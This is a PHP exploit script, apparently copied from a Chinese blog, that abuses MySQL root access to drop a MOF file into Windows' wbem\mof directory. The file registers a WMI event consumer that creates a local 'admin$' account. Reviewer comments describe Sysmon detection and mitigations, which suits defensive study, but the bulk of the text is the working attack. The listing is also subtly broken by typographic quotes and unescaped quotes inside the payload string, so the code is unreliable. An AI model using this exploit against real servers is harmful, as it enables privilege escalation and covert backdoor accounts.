代码如下:
<?php
// NOTE(review): this listing is a MySQL-to-Windows privilege-escalation sample
// (the classic "MOF upload" technique). It is reproduced here for defensive
// analysis only and the code is left exactly as found. It relies on the legacy
// ext/mysql API (mysql_connect/mysql_query/mysql_close), which was removed in
// PHP 7, so it will not run unmodified on a current PHP.
$mysql_server_name=’localhost’;
$mysql_username=’root’;
$mysql_password=”;
$mysql_database=’mysql’;
// mysql_connect()'s fourth parameter is the boolean new_link flag, not a database
// name; the value passed here is only interpreted as "true". The database is
// actually chosen below with mysql_select_db(). Connecting as root with an empty
// password is itself the precondition that makes this attack possible.
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
// The command the WMI consumer is meant to run: creates a local user account.
// Detection: unexpected local-account creation (Security event 4720), or
// net.exe/net1.exe spawned by WmiPrvSE.exe or by the MySQL service process.
$cmdshell="net user admin$ qwe!@#123qwe /add";
// Managed Object Format (MOF) text describing a permanent WMI event subscription:
//   - an __EventFilter that fires on __InstanceModificationEvent when
//     Win32_LocalTime.Second equals 5,
//   - an ActiveScriptEventConsumer whose JScript runs $cmdshell through WScript.Shell,
//   - a __FilterToConsumerBinding that joins the two.
// Sysmon records these three objects as event IDs 19, 20 and 21 (WmiEventFilter,
// WmiEventConsumer, WmiEventConsumerToFilter); Autoruns also lists them under its
// WMI tab. Any ActiveScriptEventConsumer on a server is worth investigating.
$payload = "#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"$cmdshell\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};";
mysql_select_db($mysql_database,$conn);
// Writes the MOF text into the wbem\mof directory with SELECT ... INTO OUTFILE.
// This requires the MySQL FILE privilege and a MySQL service account with write
// access under system32, and it depends on legacy Windows (XP/2003-era) behaviour
// of auto-compiling files dropped there; later Windows versions no longer do this.
// Mitigations: run MySQL as a low-privilege service account, set secure_file_priv
// to a dedicated directory (or disable file writes entirely), revoke FILE from
// application accounts, and never expose root without a password. Monitoring
// file creation in wbem\mof (Sysmon event 11) catches the drop itself.
$sql="select ‘$payload’ into outfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;";
$result=mysql_query($sql);
mysql_close($conn);
?>
